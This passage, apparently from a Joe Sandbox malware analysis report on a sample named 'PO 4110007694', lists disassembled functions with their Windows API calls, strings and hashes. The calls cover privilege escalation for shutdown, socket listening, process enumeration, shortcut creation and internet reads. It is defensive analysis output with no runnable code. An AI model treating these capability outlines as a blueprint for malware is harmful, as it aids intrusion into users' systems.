                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 2649000838-1173974218
                                                                    • Opcode ID: 5aabbb6feaea912b73c7bcd195ca169e53a82b4db09b132ea67ab53a3325734d
                                                                    • Instruction ID: 34f6dbe9be4e850be837568582e7a9c1db98ab8d714c405d6086a13fd2f39a49
                                                                    • Opcode Fuzzy Hash: 5aabbb6feaea912b73c7bcd195ca169e53a82b4db09b132ea67ab53a3325734d
                                                                    • Instruction Fuzzy Hash: 6C318231008385DBC301EF24C8959EFB7A8BE96314F444E2DF4E992191EB25DA09F793
                                                                    Function 00C751BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
                                                                      • Part of subcall function 00C687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
                                                                      • Part of subcall function 00C687E1: GetLastError.KERNEL32 ref: 00C68865
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00C751F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-194228
                                                                    • Opcode ID: 8dbe2a99ef90e7060e6d0d6ad31c8b1252a1973fbc486f54a91bf8a70e563409
                                                                    • Instruction ID: 15b9e679ccc3246d7228e74456c2d3aecea06c6c09d7344bd2d24385ad0acbfc
                                                                    • Opcode Fuzzy Hash: 8dbe2a99ef90e7060e6d0d6ad31c8b1252a1973fbc486f54a91bf8a70e563409
                                                                    • Instruction Fuzzy Hash: 140126317916116BF72C6368AC8EFBF725CEB05341F218525F92FE20D3EAD21D0186A0
                                                                    Function 00C86283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C862DC
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C862EB
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00C86307
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00C86316
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C86330
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00C86344
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                    • String ID:
                                                                    • API String ID: 1279440585-0
                                                                    • Opcode ID: e47666e7b57296cac90cc98f732bb8b3924bb709d559881eb3ba92cfac4d70b4
                                                                    • Instruction ID: 2f18e5a9fe88123a01412c715452bdac81266a0c4952f14a1049108bd3c64fb0
                                                                    • Opcode Fuzzy Hash: e47666e7b57296cac90cc98f732bb8b3924bb709d559881eb3ba92cfac4d70b4
                                                                    • Instruction Fuzzy Hash: 7D21D2306002049FDB10EF64C849BAEB7A9EF45324F148159E816E73E1C770AD41DB55
                                                                    Function 00C25520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                      • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                    • _memmove.LIBCMT ref: 00C60258
                                                                    • _memmove.LIBCMT ref: 00C6036D
                                                                    • _memmove.LIBCMT ref: 00C60414
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1300846289-0
                                                                    • Opcode ID: 5aa83bc7fe39c34e62aa74e47c05a476691110ec1f8ef382787c6a8fa05fc880
                                                                    • Instruction ID: 038b1928d71962b580a274661fa4c4e42dfc0c23a5ef7cbd0de9df32ac57bd23
                                                                    • Opcode Fuzzy Hash: 5aa83bc7fe39c34e62aa74e47c05a476691110ec1f8ef382787c6a8fa05fc880
                                                                    • Instruction Fuzzy Hash: 8802DF70A00219DBCF14DF64D981AAFBBF5EF44300F2480A9E80AEB355EB31DA54DB91
                                                                    Function 00C11287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C119FA
                                                                    • GetSysColor.USER32(0000000F), ref: 00C11A4E
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00C11A61
                                                                      • Part of subcall function 00C11290: DefDlgProcW.USER32(?,00000020,?), ref: 00C112D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ColorProc$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 3744519093-0
                                                                    • Opcode ID: 012eeb0cdf2109cc3ff83550ae30c40e932e8930d2d3bfc2cfc5b44fd818aabd
                                                                    • Instruction ID: 0047979ab0831e1bc62fdb4420b3276867fcbcd8df79764b38b8503d0bf9b36a
                                                                    • Opcode Fuzzy Hash: 012eeb0cdf2109cc3ff83550ae30c40e932e8930d2d3bfc2cfc5b44fd818aabd
                                                                    • Instruction Fuzzy Hash: 9DA12971116545BEEA24AA2A5C48EFF296CEF43341F1C011AFF22D51D2CA29DE81B2B5
                                                                    Function 00C7BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00C7BCE6
                                                                    • _wcscmp.LIBCMT ref: 00C7BD16
                                                                    • _wcscmp.LIBCMT ref: 00C7BD2B
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C7BD3C
                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C7BD6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 2387731787-0
                                                                    • Opcode ID: ac889798b2e254e41f1b93de089b8a7549b8c88e02ee271c4b37a4f984654a72
                                                                    • Instruction ID: 92ed7429b93e9a6d970a3841e679702d851c6f672b4b0ba18b15f3b803cc4eba
                                                                    • Opcode Fuzzy Hash: ac889798b2e254e41f1b93de089b8a7549b8c88e02ee271c4b37a4f984654a72
                                                                    • Instruction Fuzzy Hash: 1D51AD356046019FD724DF28C490FAAB3E8EF5A320F10861DF96A873A1DB30ED05DB91
                                                                    Function 00C86747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C87DB6
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C8679E
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C867C7
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00C86800
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C8680D
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00C86821
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 99427753-0
                                                                    • Opcode ID: e77e678e5c431168c6848c83fdcd160622861e3e58b6f011e03c94c594bd059f
                                                                    • Instruction ID: 2b89cce08ccda2a730cebbc1b01f611f1903b4e164b577d9b948587c5ca656be
                                                                    • Opcode Fuzzy Hash: e77e678e5c431168c6848c83fdcd160622861e3e58b6f011e03c94c594bd059f
                                                                    • Instruction Fuzzy Hash: 4941C575A00210AFEB50BF649C96FBE77E8DF06714F04845CF916AB3D2CA709D41A791
                                                                    Function 00C95376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: 7899c5e53040de2c8f29f76f3021a89cc7352dabb5d27515e0dc7ab43af19801
                                                                    • Instruction ID: 8b203d44bf1f9a473420d631c9255965b50e4f7a2fb5e1e3bc6b69ef8f4ebb65
                                                                    • Opcode Fuzzy Hash: 7899c5e53040de2c8f29f76f3021a89cc7352dabb5d27515e0dc7ab43af19801
                                                                    • Instruction Fuzzy Hash: 2511C4317009116FEF225F269C4CB6EBB98FF457A1B514029F846D3251CBB0DD42DBA0
                                                                    Function 00C680A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C680C0
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C680CA
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C680D9
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C680E0
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C680F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 460b8e35d204f4e8c5a9c1c25a9091005a851e77f1d0ac1a57ff2e057eedfb9c
                                                                    • Instruction ID: 0a5a7d7a702a65065b2838e2963de37bd3e059669c05e5b2ac29440ef84eb5a8
                                                                    • Opcode Fuzzy Hash: 460b8e35d204f4e8c5a9c1c25a9091005a851e77f1d0ac1a57ff2e057eedfb9c
                                                                    • Instruction Fuzzy Hash: B8F04F31240204AFEB200FA5ECCDF6F3BACEF4A755B10012AF945C6160CE619D47EA60
                                                                    Function 00C7C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 00C7C432
                                                                    • CoCreateInstance.OLE32(00CA2D6C,00000000,00000001,00CA2BDC,?), ref: 00C7C44A
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • CoUninitialize.OLE32 ref: 00C7C6B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                    • String ID: .lnk
                                                                    • API String ID: 2683427295-24824748
                                                                    • Opcode ID: cdb5c5f84761c704a59568a207038bbb1f0b297802a92504e17688805b670942
                                                                    • Instruction ID: db55e488c00ea5ce46104be45ec34e7dce1a7f0e438d3c71556770bb11f70a67
                                                                    • Opcode Fuzzy Hash: cdb5c5f84761c704a59568a207038bbb1f0b297802a92504e17688805b670942
                                                                    • Instruction Fuzzy Hash: 4BA13971108205AFD700EF64C891EAFB7ECEF8A354F00492DF155871A2EB71EA49DB62
                                                                    Function 00C14B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C14AD0), ref: 00C14B45
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C14B57
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 2574300362-192647395
                                                                    • Opcode ID: 5de7587896e9a3bb1b40bec1e52894a93895a72e1e36ea30f48f3622371460a1
                                                                    • Instruction ID: 467433ddcddb43d5d12a5ab241ff1ea7b92f8faf38bd3e16a0a4d0c4ef51cd1b
                                                                    • Opcode Fuzzy Hash: 5de7587896e9a3bb1b40bec1e52894a93895a72e1e36ea30f48f3622371460a1
                                                                    • Instruction Fuzzy Hash: 90D05B75A10713CFDB209F31EC1CB4A76E4AF06351B15C83ED495D6150D770D4C1C654
                                                                    Function 00C23030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 674341424-0
                                                                    • Opcode ID: a316410fe8f4477c9c0c835502e88197aa6ec9ab77baa1c83b7f83ee0d5213f8
                                                                    • Instruction ID: 28faf56152c12a6c3a43d4fa97f573096a5d8bcc3fe2d6c3a8ad7f35c6960c31
                                                                    • Opcode Fuzzy Hash: a316410fe8f4477c9c0c835502e88197aa6ec9ab77baa1c83b7f83ee0d5213f8
                                                                    • Instruction Fuzzy Hash: 9E22DE716083509FC724EF14D891BAFB7E4EF85300F40492DF89A97291DB74EA89DB92
                                                                    Function 00C8EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00C8EE3D
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00C8EE4B
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00C8EF0B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C8EF1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                    • String ID:
                                                                    • API String ID: 2576544623-0
                                                                    • Opcode ID: df6eb435727252b051856ca4bb9bc8549c01c4fb2fbe4232dcddada218b3dfeb
                                                                    • Instruction ID: ffff89db88d2ed6d9351d78d1604a5f53796d8163a6063bb9a71b03a4003441c
                                                                    • Opcode Fuzzy Hash: df6eb435727252b051856ca4bb9bc8549c01c4fb2fbe4232dcddada218b3dfeb
                                                                    • Instruction Fuzzy Hash: 77519D71508301AFD310EF20DC85EAFB7E8EF99704F00492DF595962A1EB30E949EB92
                                                                    Function 00C1FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID:
                                                                    • API String ID: 3964851224-0
                                                                    • Opcode ID: b907d2ebcd9c00bdc80febf7880b04901c3d5d6956a220c05fcb53f46ab5d509
                                                                    • Instruction ID: 8ec83816773ea3a7c401f47d3bc0e6bc01f1944faf58be5f7ea98137422a83b5
                                                                    • Opcode Fuzzy Hash: b907d2ebcd9c00bdc80febf7880b04901c3d5d6956a220c05fcb53f46ab5d509
                                                                    • Instruction Fuzzy Hash: A5928C746083518FD724DF14C480B6AB7E1BF85304F24892EF89A8B762D771ED89DB92
                                                                    Function 00C6E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C6E628
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: ($|
                                                                    • API String ID: 1659193697-1631851259
                                                                    • Opcode ID: 85f609792351564b12c4efd0ebdc91afcceeb370bd9a382d7f5e55395d4a06a6
                                                                    • Instruction ID: f331bf1721dcd2f987d68694635aaf6e496811c44356d9c77c04c2b8a52fdfd9
                                                                    • Opcode Fuzzy Hash: 85f609792351564b12c4efd0ebdc91afcceeb370bd9a382d7f5e55395d4a06a6
                                                                    • Instruction Fuzzy Hash: 94322679A007059FDB28CF59C48196AB7F1FF48310B15C56EE8AADB3A1E770E941CB44
                                                                    Function 00C822EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C8180A,00000000), ref: 00C823E1
                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C82418
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                    • String ID:
                                                                    • API String ID: 599397726-0
                                                                    • Opcode ID: 9c021c6dcfce795d7e790357a464de86568018f481b1900b03a2d82e54928c51
                                                                    • Instruction ID: 3f8c57eabcf3d54fb7e8636271d3fc55b57f78343de2e05f1c381104f9e000ed
                                                                    • Opcode Fuzzy Hash: 9c021c6dcfce795d7e790357a464de86568018f481b1900b03a2d82e54928c51
                                                                    • Instruction Fuzzy Hash: 3541F871504209BFEB20EE95DC89FBFB7BCEB80318F10402EF651A7150DA759E41A768
                                                                    Function 00C7B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
